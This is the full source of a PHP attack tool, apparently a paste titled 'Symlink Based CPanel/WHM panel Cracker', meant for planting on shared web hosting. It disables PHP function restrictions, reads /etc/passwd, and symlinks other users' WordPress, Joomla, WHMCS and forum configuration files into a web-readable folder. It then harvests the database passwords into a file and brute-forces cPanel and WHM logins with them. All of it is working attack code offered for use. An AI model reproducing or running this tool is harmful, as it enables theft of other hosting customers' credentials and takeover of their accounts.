php cp crack

1. <?php
2.  
3. $head = '
4. <html>
5. <head>
6. </script>
7. <title>Symlink Based CPanel/WHM panel Cracker</title>
8.  
9. <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
10.  
11. <STYLE>
12. body {
13. font-family: Tahoma
14. }
15. tr {
16. BORDER: dashed 1px #333;
17. color: #FFF;
18. }
19. td {
20. BORDER: dashed 1px #333;
21. color: #FFF;
22. }
23. .table1 {
24. BORDER: 0px Black;
25. BACKGROUND-COLOR: Black;
26. color: #FFF;
27. }
28. .td1 {
29. BORDER: 0px;
30. BORDER-COLOR: #333333;
31. font: 7pt Verdana;
32. color: Green;
33. }
34. .tr1 {
35. BORDER: 0px;
36. BORDER-COLOR: #333333;
37. color: #FFF;
38. }
39. table {
40. BORDER: dashed 1px #333;
41. BORDER-COLOR: #333333;
42. BACKGROUND-COLOR: Black;
43. color: #FFF;
44. }
45. input {
46. border : solid 3px ;
47. border-color : #333;
48. BACKGROUND-COLOR: white;
49. font: 11pt Verdana;
50. color: #333;
51. }
52. select {
53. BORDER-RIGHT: Black 1px solid;
54. BORDER-TOP: #DF0000 1px solid;
55. BORDER-LEFT: #DF0000 1px solid;
56. BORDER-BOTTOM: Black 1px solid;
57. BORDER-color: #FFF;
58. BACKGROUND-COLOR: Black;
59. font: 8pt Verdana;
60. color: Red;
61. }
62. submit {
63. BORDER: buttonhighlight 2px outset;
64. BACKGROUND-COLOR: Black;
65. width: 30%;
66. color: #FFF;
67. }
68. textarea {
69. border : dashed 1px #333;
70. BACKGROUND-COLOR: Black;
71. font: Fixedsys bold;
72. color: #999;
73. }
74. BODY {
75. SCROLLBAR-FACE-COLOR: Black; SCROLLBAR-HIGHLIGHT-color: #FFF; SCROLLBAR-SHADOW-color: #FFF; SCROLLBAR-3DLIGHT-color: #FFF; SCROLLBAR-ARROW-COLOR: Black; SCROLLBAR-TRACK-color: #FFF; SCROLLBAR-DARKSHADOW-color: #FFF
76. margin: 1px;
77. color: Red;
78. background-color: Black;
79. }
80. .main {
81. margin : -287px 0px 0px -490px;
82. BORDER: dashed 1px #333;
83. BORDER-COLOR: #333333;
84. }
85. .tt {
86. background-color: Black;
87. }
88.  
89. A:link {
90. COLOR: White; TEXT-DECORATION: none
91. }
92. A:visited {
93. COLOR: White; TEXT-DECORATION: none
94. }
95. A:hover {
96. color: Red; TEXT-DECORATION: none
97. }
98. A:active {
99. color: Red; TEXT-DECORATION: none
100. }
101. </STYLE>
102. <script language=\'javascript\'>
103. function hide_div(id)
104. {
105. document.getElementById(id).style.display = \'none\';
106. document.cookie=id+\'=0;\';
107. }
108. function show_div(id)
109. {
110. document.getElementById(id).style.display = \'block\';
111. document.cookie=id+\'=1;\';
112. }
113. function change_divst(id)
114. {
115. if (document.getElementById(id).style.display == \'none\')
116. show_div(id);
117. else
118. hide_div(id);
119. }
120. </script>'; ?>
121. <html>
122. <head>
123.  
124. <link rel="SHORTCUT ICON" type="image/x-icon" href="http://s13.postimg.org/d82nq5frb/UBHFinal1.png"><center>
125. <a href="#"> <img src="http://aj3dx.altervista.org/anonymous-psn-hacker.jpg" border="0"></center></a>
126.  
127. <h2><center>Symlink Based CPanel/WHM panel Cracker</center></h2>
128. <?php
129. echo $head ;
130. echo '
131.  
132. <table width="100%" cellspacing="0" cellpadding="0" class="tb1" >
133.  
134. </td></tr><tr><td
135. width="100%" align="center" valign="top" rowspan="1"><font
136. color="red" face="arial"size="1"><b>
137.  
138. ';
139.  
140. ?>
141. <body bgcolor=black><h3 style="text-align:center"><font color=red size=2 face="arial">
142. <form method=post>
143. <input type=submit name=ini value="Generate PHP.ini" /></form>
144. <?php
145. if(isset($_POST['ini']))
146. {
147.  
148. $r=fopen('php.ini','w');
149. $rr=" disable_functions=none ";
150. fwrite($r,$rr);
151. $link="<a href=php.ini><font color=white size=2 face=\"arial\"><u>link to php.ini file</u></font></a>";
152. echo $link;
153.  
154. }
155. ?>
156. <?php
157.  
158. ?>
159. <form method=post>
160. <input type=submit name="usre" value="Extract Usernames" /></form>
161.  
162.  
163.  
164.  
165. <?php
166. if(isset($_POST['usre'])){
167. ?><form method=post>
168. <textarea rows=10 cols=30 name=user><?php $users=file("/etc/passwd");
169. foreach($users as $user)
170. {
171. $str=explode(":",$user);
172. echo $str[0]."\n";
173. }
174.  
175. ?></textarea><br><br>
176. <input type=submit name=su value="Start" /></form>
177. <?php } ?>
178. <?php
179. error_reporting(0);
180. echo "<font color=red size=2 face=\"arial\">";
181. if(isset($_POST['su']))
182. {
183.  
184. $dir=mkdir('BT',0777);
185. $r = " Options all \n DirectoryIndex BT.html \n Require None \n Satisfy Any";
186. $f = fopen('BT/.htaccess','w');
187.  
188. fwrite($f,$r);
189. $consym="<a href=BT/><font color=white size=3 face=\"arial\">Configuration files</font></a>";
190. echo "<br>Folder Where Config Files has been Symlinked<br><u><font color=red size=2 face=\"arial\">$consym</font></u>";
191.  
192. $usr=explode("\n",$_POST['user']);
193.  
194. foreach($usr as $uss )
195. {
196. $us=trim($uss);
197.  
198. $r="BT/";
199. @symlink('/home/'.$us.'/public_html/wp-config.php',$r.$us.'..wp-config');
200. @symlink('/home/'.$us.'/public_html/wordpress/wp-config.php',$r.$us.'..word-wp');
201. @symlink('/home/'.$us.'/public_html/blog/wp-config.php',$r.$us.'..wpblog');
202. @symlink('/home/'.$us.'/public_html/configuration.php',$r.$us.'..joomla-or-whmcs');
203. @symlink('/home/'.$us.'/public_html/joomla/configuration.php',$r.$us.'..joomla');
204. @symlink('/home/'.$us.'/public_html/vb/includes/config.php',$r.$us.'..vbinc');
205. @symlink('/home/'.$us.'/public_html/includes/config.php',$r.$us.'..vb');
206. @symlink('/home/'.$us.'/public_html/conf_global.php',$r.$us.'..conf_global');
207. @symlink('/home/'.$us.'/public_html/inc/config.php',$r.$us.'..inc');
208. @symlink('/home/'.$us.'/public_html/config.php',$r.$us.'..config');
209. @symlink('/home/'.$us.'/public_html/Settings.php',$r.$us.'..Settings');
210. @symlink('/home/'.$us.'/public_html/sites/default/settings.php',$r.$us.'..sites');
211. @symlink('/home/'.$us.'/public_html/whm/configuration.php',$r.$us.'..whm');
212. @symlink('/home/'.$us.'/public_html/whmcs/configuration.php',$r.$us.'..whmcs');
213. @symlink('/home/'.$us.'/public_html/support/configuration.php',$r.$us.'..supporwhmcs');
214. @symlink('/home/'.$us.'/public_html/whmc/WHM/configuration.php',$r.$us.'..WHM');
215. @symlink('/home/'.$us.'/public_html/whm/WHMCS/configuration.php',$r.$us.'..whmc');
216. @symlink('/home/'.$us.'/public_html/whm/whmcs/configuration.php',$r.$us.'..WHMcs');
217. @symlink('/home/'.$us.'/public_html/support/configuration.php',$r.$us.'..whmcsupp');
218. @symlink('/home/'.$us.'/public_html/clients/configuration.php',$r.$us.'..whmcs-cli');
219. @symlink('/home/'.$us.'/public_html/client/configuration.php',$r.$us.'..whmcs-cl');
220. @symlink('/home/'.$us.'/public_html/clientes/configuration.php',$r.$us.'..whmcs-CL');
221. @symlink('/home/'.$us.'/public_html/cliente/configuration.php',$r.$us.'..whmcs-Cl');
222. @symlink('/home/'.$us.'/public_html/clientsupport/configuration.php',$r.$us.'..whmcs-csup');
223. @symlink('/home/'.$us.'/public_html/billing/configuration.php',$r.$us.'..whmcs-bill');
224. @symlink('/home/'.$us.'/public_html/admin/config.php',$r.$us.'..admin-conf');
225. @symlink('/home/'.$us.'/public_html/includes/configure.php',$r.$us.'-shop.txt');
226. @symlink('/home/'.$us.'/public_html/os/includes/configure.php',$r.$us.'-shop-os.txt');
227. @symlink('/home/'.$us.'/public_html/oscom/includes/configure.php',$r.$us.'-oscom.txt');
228. @symlink('/home/'.$us.'/public_html/oscommerce/includes/configure.php',$r.$us.'-oscommerce.txt');
229. @symlink('/home/'.$us.'/public_html/oscommerces/includes/configure.php',$r.$us.'-oscommerces.txt');
230. @symlink('/home/'.$us.'/public_html/shop/includes/configure.php',$r.$us.'-shop2.txt');
231. @symlink('/home/'.$us.'/public_html/shopping/includes/configure.php',$r.$us.'-shop-shopping.txt');
232. @symlink('/home/'.$us.'/public_html/sale/includes/configure.php',$r.$us.'-sale.txt');
233. @symlink('/home/'.$us.'/public_html/amember/config.inc.php',$r.$us.'-amember.txt');
234. @symlink('/home/'.$us.'/public_html/config.inc.php',$r.$us.'-amember2.txt');
235. @symlink('/home/'.$us.'/public_html/members/configuration.php',$r.$us.'-members.txt');
236. @symlink('/home/'.$us.'/public_html/config.php',$r.$us.'-4images1.txt');
237. @symlink('/home/'.$us.'/public_html/forum/includes/config.php',$r.$us.'-forum.txt');
238. @symlink('/home/'.$us.'/public_html/forums/includes/config.php',$r.$us.'-forums.txt');
239. @symlink('/home/'.$us.'/public_html/admin/conf.php',$r.$us.'-5.txt');
240. @symlink('/home/'.$us.'/public_html/admin/config.php',$r.$us.'-4.txt');
241. @symlink('/home/'.$us.'/public_html/wp-config.php',$r.$us.'-wp13.txt');
242. @symlink('/home/'.$us.'/public_html/wp/wp-config.php',$r.$us.'-wp13-wp.txt');
243. @symlink('/home/'.$us.'/public_html/WP/wp-config.php',$r.$us.'-wp13-WP.txt');
244. @symlink('/home/'.$us.'/public_html/wp/beta/wp-config.php',$r.$us.'-wp13-wp-beta.txt');
245. @symlink('/home/'.$us.'/public_html/beta/wp-config.php',$r.$us.'-wp13-beta.txt');
246. @symlink('/home/'.$us.'/public_html/press/wp-config.php',$r.$us.'-wp13-press.txt');
247. @symlink('/home/'.$us.'/public_html/wordpress/wp-config.php',$r.$us.'-wp13-wordpress.txt');
248. @symlink('/home/'.$us.'/public_html/Wordpress/wp-config.php',$r.$us.'-wp13-Wordpress.txt');
249. @symlink('/home/'.$us.'/public_html/blog/wp-config.php',$r.$us.'-wp13-Wordpress.txt');
250. @symlink('/home/'.$us.'/public_html/wordpress/beta/wp-config.php',$r.$us.'-wp13-wordpress-beta.txt');
251. @symlink('/home/'.$us.'/public_html/news/wp-config.php',$r.$us.'-wp13-news.txt');
252. @symlink('/home/'.$us.'/public_html/new/wp-config.php',$r.$us.'-wp13-new.txt');
253. @symlink('/home/'.$us.'/public_html/blog/wp-config.php',$r.$us.'-wp-blog.txt');
254. @symlink('/home/'.$us.'/public_html/beta/wp-config.php',$r.$us.'-wp-beta.txt');
255. @symlink('/home/'.$us.'/public_html/blogs/wp-config.php',$r.$us.'-wp-blogs.txt');
256. @symlink('/home/'.$us.'/public_html/home/wp-config.php',$r.$us.'-wp-home.txt');
257. @symlink('/home/'.$us.'/public_html/protal/wp-config.php',$r.$us.'-wp-protal.txt');
258. @symlink('/home/'.$us.'/public_html/site/wp-config.php',$r.$us.'-wp-site.txt');
259. @symlink('/home/'.$us.'/public_html/main/wp-config.php',$r.$us.'-wp-main.txt');
260. @symlink('/home/'.$us.'/public_html/test/wp-config.php',$r.$us.'-wp-test.txt');
261. @symlink('/home/'.$us.'/public_html/arcade/functions/dbclass.php',$r.$us.'-ibproarcade.txt');
262. @symlink('/home/'.$us.'/public_html/arcade/functions/dbclass.php',$r.$us.'-ibproarcade.txt');
263. @symlink('/home/'.$us.'/public_html/joomla/configuration.php',$r.$us.'-joomla2.txt');
264. @symlink('/home/'.$us.'/public_html/protal/configuration.php',$r.$us.'-joomla-protal.txt');
265. @symlink('/home/'.$us.'/public_html/joo/configuration.php',$r.$us.'-joo.txt');
266. @symlink('/home/'.$us.'/public_html/cms/configuration.php',$r.$us.'-joomla-cms.txt');
267. @symlink('/home/'.$us.'/public_html/site/configuration.php',$r.$us.'-joomla-site.txt');
268. @symlink('/home/'.$us.'/public_html/main/configuration.php',$r.$us.'-joomla-main.txt');
269. @symlink('/home/'.$us.'/public_html/news/configuration.php',$r.$us.'-joomla-news.txt');
270. @symlink('/home/'.$us.'/public_html/new/configuration.php',$r.$us.'-joomla-new.txt');
271. @symlink('/home/'.$us.'/public_html/home/configuration.php',$r.$us.'-joomla-home.txt');
272. @symlink('/home/'.$us.'/public_html/vb/includes/config.php',$r.$us.'-vb-config.txt');
273. @symlink('/home/'.$us.'/public_html/vb3/includes/config.php',$r.$us.'-vb3-config.txt');
274. @symlink('/home/'.$us.'/public_html/cc/includes/config.php',$r.$us.'-vb1-config.txt');
275. @symlink('/home/'.$us.'/public_html/includes/config.php',$r.$us.'-includes-vb.txt');
276. @symlink('/home/'.$us.'/public_html/forum/includes/class_core.php',$r.$us.'-vbluttin-class_core.php.txt');
277. @symlink('/home/'.$us.'/public_html/vb/includes/class_core.php',$r.$us.'-vbluttin-class_core.php1.txt');
278. @symlink('/home/'.$us.'/public_html/cc/includes/class_core.php',$r.$us.'-vbluttin-class_core.php2.txt');
279. @symlink('/home/'.$us.'/public_html/whm/configuration.php',$r.$us.'-whm15.txt');
280. @symlink('/home/'.$us.'/public_html/central/configuration.php',$r.$us.'-whm-central.txt');
281. @symlink('/home/'.$us.'/public_html/whm/whmcs/configuration.php',$r.$us.'-whm-whmcs.txt');
282. @symlink('/home/'.$us.'/public_html/whm/WHMCS/configuration.php',$r.$us.'-whm-WHMCS.txt');
283. @symlink('/home/'.$us.'/public_html/whmc/WHM/configuration.php',$r.$us.'-whmc-WHM.txt');
284. @symlink('/home/'.$us.'/public_html/whmcs/configuration.php',$r.$us.'-whmcs.txt');
285. @symlink('/home/'.$us.'/public_html/support/configuration.php',$r.$us.'-support.txt');
286. @symlink('/home/'.$us.'/public_html/supp/configuration.php',$r.$us.'-supp.txt');
287. @symlink('/home/'.$us.'/public_html/secure/configuration.php',$r.$us.'-sucure.txt');
288. @symlink('/home/'.$us.'/public_html/secure/whm/configuration.php',$r.$us.'-sucure-whm.txt');
289. @symlink('/home/'.$us.'/public_html/secure/whmcs/configuration.php',$r.$us.'-sucure-whmcs.txt');
290. @symlink('/home/'.$us.'/public_html/cpanel/configuration.php',$r.$us.'-cpanel.txt');
291. @symlink('/home/'.$us.'/public_html/panel/configuration.php',$r.$us.'-panel.txt');
292. @symlink('/home/'.$us.'/public_html/host/configuration.php',$r.$us.'-host.txt');
293. @symlink('/home/'.$us.'/public_html/hosting/configuration.php',$r.$us.'-hosting.txt');
294. @symlink('/home/'.$us.'/public_html/hosts/configuration.php',$r.$us.'-hosts.txt');
295. @symlink('/home/'.$us.'/public_html/configuration.php',$r.$us.'-joomla.txt');
296. @symlink('/home/'.$us.'/public_html/submitticket.php',$r.$us.'-whmcs2.txt');
297. @symlink('/home/'.$us.'/public_html/clients/configuration.php',$r.$us.'-clients.txt');
298. @symlink('/home/'.$us.'/public_html/client/configuration.php',$r.$us.'-client.txt');
299. @symlink('/home/'.$us.'/public_html/clientes/configuration.php',$r.$us.'-clientes.txt');
300. @symlink('/home/'.$us.'/public_html/cliente/configuration.php',$r.$us.'-client.txt');
301. @symlink('/home/'.$us.'/public_html/clientsupport/configuration.php',$r.$us.'-clientsupport.txt');
302. @symlink('/home/'.$us.'/public_html/billing/configuration.php',$r.$us.'-billing.txt');
303. @symlink('/home/'.$us.'/public_html/manage/configuration.php',$r.$us.'-whm-manage.txt');
304. @symlink('/home/'.$us.'/public_html/my/configuration.php',$r.$us.'-whm-my.txt');
305. @symlink('/home/'.$us.'/public_html/myshop/configuration.php',$r.$us.'-whm-myshop.txt');
306. @symlink('/home/'.$us.'/public_html/includes/dist-configure.php',$r.$us.'-zencart.txt');
307. @symlink('/home/'.$us.'/public_html/zencart/includes/dist-configure.php',$r.$us.'-shop-zencart.txt');
308. @symlink('/home/'.$us.'/public_html/shop/includes/dist-configure.php',$r.$us.'-shop-ZCshop.txt');
309. @symlink('/home/'.$us.'/public_html/Settings.php',$r.$us.'-smf.txt');
310. @symlink('/home/'.$us.'/public_html/smf/Settings.php',$r.$us.'-smf2.txt');
311. @symlink('/home/'.$us.'/public_html/forum/Settings.php',$r.$us.'-smf-forum.txt');
312. @symlink('/home/'.$us.'/public_html/forums/Settings.php',$r.$us.'-smf-forums.txt');
313. @symlink('/home/'.$us.'/public_html/upload/includes/config.php',$r.$us.'-up.txt');
314. @symlink('/home/'.$us.'/public_html/article/config.php',$r.$us.'-Nwahy.txt');
315. @symlink('/home/'.$us.'/public_html/up/includes/config.php',$r.$us.'-up2.txt');
316. @symlink('/home/'.$us.'/public_html/conf_global.php',$r.$us.'-6.txt');
317. @symlink('/home/'.$us.'/public_html/include/db.php',$r.$us.'-7.txt');
318. @symlink('/home/'.$us.'/public_html/connect.php',$r.$us.'-PHP-Fusion.txt');
319. @symlink('/home/'.$us.'/public_html/mk_conf.php',$r.$us.'-9.txt');
320. @symlink('/home/'.$us.'/public_html/includes/config.php',$r.$us.'-traidnt1.txt');
321. @symlink('/home/'.$us.'/public_html/config.php',$r.$us.'-4images.txt');
322. @symlink('/home/'.$us.'/public_html/sites/default/settings.php',$r.$us.'-Drupal.txt');
323. @symlink('/home/'.$us.'/public_html/member/configuration.php',$r.$us.'-1member.txt') ;
324. @symlink('/home/'.$us.'/public_html/billings/configuration.php',$r.$us.'-billings.txt') ;
325. @symlink('/home/'.$us.'/public_html/whm/configuration.php',$r.$us.'-whm.txt');
326. @symlink('/home/'.$us.'/public_html/supports/configuration.php',$r.$us.'-supports.txt');
327. @symlink('/home/'.$us.'/public_html/requires/config.php',$r.$us.'-AM4SS-hosting.txt');
328. @symlink('/home/'.$us.'/public_html/supports/includes/iso4217.php',$r.$us.'-hostbills-supports.txt');
329. @symlink('/home/'.$us.'/public_html/client/includes/iso4217.php',$r.$us.'-hostbills-client.txt');
330. @symlink('/home/'.$us.'/public_html/support/includes/iso4217.php',$r.$us.'-hostbills-support.txt');
331. @symlink('/home/'.$us.'/public_html/billing/includes/iso4217.php',$r.$us.'-hostbills-billing.txt');
332. @symlink('/home/'.$us.'/public_html/billings/includes/iso4217.php',$r.$us.'-hostbills-billings.txt');
333. @symlink('/home/'.$us.'/public_html/host/includes/iso4217.php',$r.$us.'-hostbills-host.txt');
334. @symlink('/home/'.$us.'/public_html/hosts/includes/iso4217.php',$r.$us.'-hostbills-hosts.txt');
335. @symlink('/home/'.$us.'/public_html/hosting/includes/iso4217.php',$r.$us.'-hostbills-hosting.txt');
336. @symlink('/home/'.$us.'/public_html/hostings/includes/iso4217.php',$r.$us.'-hostbills-hostings.txt');
337. @symlink('/home/'.$us.'/public_html/includes/iso4217.php',$r.$us.'-hostbills.txt');
338. @symlink('/home/'.$us.'/public_html/hostbills/includes/iso4217.php',$r.$us.'-hostbills-hostbills.txt');
339. @symlink('/home/'.$us.'/public_html/hostbill/includes/iso4217.php',$r.$us.'-hostbills-hostbill.txt');
340.  
341. }
342. }
343. ?>
344. <?php
345.  
346. ?>
347.  
348. <form method=post>
349. <input type=submit name=sm value="Grab Passwords from Configuration files"></form>
350. <?php
351. error_reporting(0);
352. set_time_limit(0);
353. function entre2v2($text,$marqueurDebutLien,$marqueurFinLien)
354. {
355.  
356. $ar0=explode($marqueurDebutLien, $text);
357. $ar1=explode($marqueurFinLien, $ar0[1]);
358. $ar=trim($ar1[0]);
359. return $ar;
360. }
361.  
362. if(isset($_POST['sm']))
363.  
364. {
365.  
366. echo '<font color=green>OK++';
367.  
368. $ffile=fopen('BT.txt','a+');
369.  
370.  
371. $r= 'http://'.$_SERVER['SERVER_NAME'].dirname($_SERVER['SCRIPT_NAME'])."/BT/";
372. $re=$r;
373. $confi=array("..wp-config","..word-wp","..wpblog","..config","..admin-conf","..vb","..joomla-or-whmcs","..joomla","..vbinc","..whm","..whmcs","..supporwhmcs","..WHM","..whmc","..WHMcs","..whmcsupp","..whmcs-cli","..whmcs-cl","..whmcs-CL","..whmcs-Cl","..whmcs-csup","..whmcs-bill");
374.  
375. $users=file("/etc/passwd");
376. foreach($users as $user)
377. {
378.  
379. $str=explode(":",$user);
380. $usersss=$str[0];
381. foreach($confi as $co)
382. {
383.  
384.  
385. $uurl=$re.$usersss.$co;
386. $uel=$uurl;
387.  
388. $ch = curl_init();
389.  
390. curl_setopt($ch, CURLOPT_URL, $uel);
391. curl_setopt($ch, CURLOPT_HEADER, 1);
392. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
393. curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
394. curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.8) Gecko/2009032609 Firefox/3.0.8');
395. $result['EXE'] = curl_exec($ch);
396. curl_close($ch);
397. $uxl=$result['EXE'];
398.  
399.  
400. if($uxl && preg_match('/table_prefix/i',$uxl))
401. {
402.  
403. echo "<div align=center><table width=60% ><tr><td align=center><font color=red size=4 face='arial'> $usersss  User's CMS is Wordpress </font></td></tr></table>";
404.  
405.  echo $dbp=entre2v2($uxl,"DB_PASSWORD', '","');");
406. if(!empty($dbp))
407. $pass=$dbp."\n";
408. fwrite($ffile,$pass);
409.  
410. }
411. elseif($uxl && preg_match('/cc_encryption_hash/i',$uxl))
412. {
413.  
414. echo "<div align=center><table width=60% ><tr><td align=center><font color=red size=4 face='arial'> $usersss  User's CMS is Whmcs </font></td></tr></table>";
415.  
416. echo $dbp=entre2v2($uxl,"db_password = '","';");
417. if(!empty($dbp))
418. $pass=$dbp."\n";
419. fwrite($ffile,$pass);
420.  
421. }
422.  
423.  
424. elseif($uxl && preg_match('/dbprefix/i',$uxl))
425. {
426.  
427. echo "<div align=center><table width=60% ><tr><td align=center><font color=red size=4 face='arial'> $usersss  User's CMS is Joomla </font></td></tr></table>";
428.  
429. echo $db=entre2v2($uxl,"password = '","';");
430. if(!empty($db))
431. $pass=$db."\n";
432. fwrite($ffile,$pass);
433. }
434. elseif($uxl && preg_match('/admincpdir/i',$uxl))
435. {
436.  
437. echo "<div align=center><table width=60% ><tr><td align=center><font color=red size=4 face='arial'> $usersss  User's CMS is vbulletin </font></td></tr></table>";
438.  
439. echo $db=entre2v2($uxl,"password'] = '","';");
440. if(!empty($db))
441. $pass=$db."\n";
442. fwrite($ffile,$pass);
443.  
444. }
445. elseif($uxl && preg_match('/DB_DATABASE/i',$uxl))
446. {
447.  
448. echo "<div align=center><table width=60% ><tr><td align=center><font color=red size=4 face='arial'> Got Config File for Unknwon CMS of User $usersss </font></td></tr></table>";
449.  
450. echo $db=entre2v2($uxl,"DB_PASSWORD', '","');");
451. if(!empty($db))
452. $pass=$db."\n";
453. fwrite($ffile,$pass);
454. }
455. elseif($uxl && preg_match('/dbpass/i',$uxl))
456. {
457.  
458. echo "<div align=center><table width=60% ><tr><td align=center><font color=red size=4 face='arial'> Got Config File for Unknwon CMS of User $usersss </font></td></tr></table>";
459.  
460. echo $db=entre2v2($uxl,"dbpass = '","';");
461. if(!empty($db))
462. $pass=$db."\n";
463. fwrite($ffile,$pass);
464. }
465. elseif($uxl && preg_match('/dbpass/i',$uxl))
466. {
467.  
468. echo "<div align=center><table width=60% ><tr><td align=center><font color=red size=4 face='arial'> Got Config File for Unknwon CMS of User $usersss </font></td></tr></table>";
469.  
470. echo $db=entre2v2($uxl,"dbpass = '","';");
471. if(!empty($db))
472. $pass=$db."\n";
473. fwrite($ffile,$pass);
474.  
475. }
476. elseif($uxl && preg_match('/dbpass/i',$uxl))
477. {
478.  
479. echo "<div align=center><table width=60% ><tr><td align=center><font color=red size=4 face='arial'> Got Config File for Unknwon CMS of User $usersss </font></td></tr></table>";
480.  
481. echo $db=entre2v2($uxl,"dbpass = \"","\";");
482. if(!empty($db))
483. $pass=$db."\n";
484. fwrite($ffile,$pass);
485. }
486.  
487.  
488. }
489. }
490. }
491. ?>
492. <?php
493.  
494. ?>
495.  
496.  
497. <form method=post>
498. <input type=submit name=cpanel value="Auto CPanel/WHM panel cracker"><p>
499. <?php
500.  
501. if(isset($_POST['cpanel']))
502. {
503. ?>
504. <form method=post><div align=center><table>
505. want to brute=><select name="op"> <option name="op" value="cp">CPanel</option>
506. <option name="op" value="whm">WHMPanel</option></table><p>
507. <textarea style="background:black;color:white" rows=20 cols=25 name=usernames ><?php $users=file("/etc/passwd");
508. foreach($users as $user)
509. {
510. $str=explode(":",$user);
511. echo $str[0]."\n";
512. }
513.  
514. ?></textarea><textarea style="background:black;color:white" rows=20 cols=25 name=passwords >
515. <?php
516.  
517. $d=getcwd()."/BT.txt";
518. $pf=file($d);
519. foreach($pf as $rt)
520. {
521. $str=explode('\n',$rt);
522. echo trim($str[0])."\n";
523. } ?></textarea><p>
524. <input type=submit name=cpanelcracking value="Start"></form>
525. <?php
526. }
527. ?>
528.  
529.  
530.  
531.  
532. <?php
533. error_reporting(0);
534. $connect_timeout=5;
535. set_time_limit(0);
536.  
537. $userl=$_POST['usernames'];
538. $passl=$_POST['passwords'];
539. $attack=$_POST['op'];
540. $target = "localhost";
541.  
542. if(isset($_POST['cpanelcracking']))
543. {
544. if($userl!=="" && $passl!=="")
545. {
546. if($_POST["op"]=="cp")
547. {
548. $cracked=$_POST['crack'];
549. @fopen($cracked,'a');
550. echo "Attacking CPanel....please wait till the end of process \n";
551.  
552.  
553. }
554. elseif($_POST["op"]=="whm")
555. {
556. @fopen($cracked,'a');
557. echo "Attacking WHM panel....please wait till the end of process";
558.  
559. }
560.  
561. function cpanel($host,$user,$pass,$timeout){
562. $ch = curl_init();
563. curl_setopt($ch, CURLOPT_URL, "http://$host:2082");
564. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
565. curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);
566. curl_setopt($ch, CURLOPT_USERPWD, "$user:$pass");
567. curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
568. curl_setopt($ch, CURLOPT_FAILONERROR, 1);
569. $data = curl_exec($ch);
570. if ( curl_errno($ch) == 0 ){
571. echo "<table width=100% ><tr><td align=center><b></font>
572.  
573. <font color=red size=2> Cracked </font>
574.  
575. <font color=white size=2> Username is </font>
576.  
577. <font color=green size=2> $user</font>
578.  
579. <font color=red size=2> & </font>
580.  
581. <font color=white size=2> Password is </font>
582.  
583. <font color=green size=2> $pass </font>
584.  
585. </font></b></td></tr></table>";
586.  
587. }
588.  
589. curl_close($ch);}
590.  
591. $userlist=explode("\n",$userl);
592. $passlist=explode("\n",$passl);
593.  
594. if ($attack == "cp")
595. {
596. foreach ($userlist as $user) {
597. echo "<div align=center><table width=80% ><tr><td align=center><b><font color=red size=1>Attacking user $user </font></td></tr></table>";
598. $finaluser = trim($user);
599. foreach ($passlist as $password ) {
600. $finalpass = trim($password);
601.  
602.  
603. cpanel($target,$finaluser,$finalpass,$connect_timeout);
604.  
605. }
606. }
607.  
608. }
609.  
610. function whm($host,$user,$pass,$timeout){
611. $ch = curl_init();
612. curl_setopt($ch, CURLOPT_URL, "http://$host:2086");
613. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
614. curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);
615. curl_setopt($ch, CURLOPT_USERPWD, "$user:$pass");
616. curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
617. curl_setopt($ch, CURLOPT_FAILONERROR, 1);
618. $data = curl_exec($ch);
619. if ( curl_errno($ch) == 0 ){
620. echo "<table width=100% ><tr><td align=center><b></font>
621.  
622. <font color=red size=2> Cracked </font>
623.  
624. <font color=white size=2> Username is </font>
625.  
626. <font color=green size=2> $user</font>
627.  
628. <font color=red size=2> & </font>
629.  
630. <font color=white size=2> Password is </font>
631.  
632. <font color=green size=2> $pass </font>
633.  
634. </font></b></td></tr></table>";
635.  
636.  
637.  
638.  
639. }
640.  
641.  
642. curl_close($ch);}
643. $userlist=explode("\n",$userl);
644. $passlist=explode("\n",$passl);
645.  
646. if ($attack == "whm")
647. {
648. foreach ($userlist as $user) {
649. echo "<div align=center><table width=80% ><tr><td align=center><b><font color=red size=1>user under attack is $user </font></td></tr></table>";
650. $finaluser = trim($user);
651. foreach ($passlist as $password ) {
652. $finalpass = trim($password);
653.  
654. whm($target,$finaluser,$finalpass,$connect_timeout);
655. }
656. }
657. }
658. }
659. elseif($userl=="")
660. {
661. echo "you have left userlist field empty";
662.  
663. }
664. elseif($passl=="")
665. {
666.  
667. echo "please put passwords in paasword list field";
668. }
669. }
670. ?>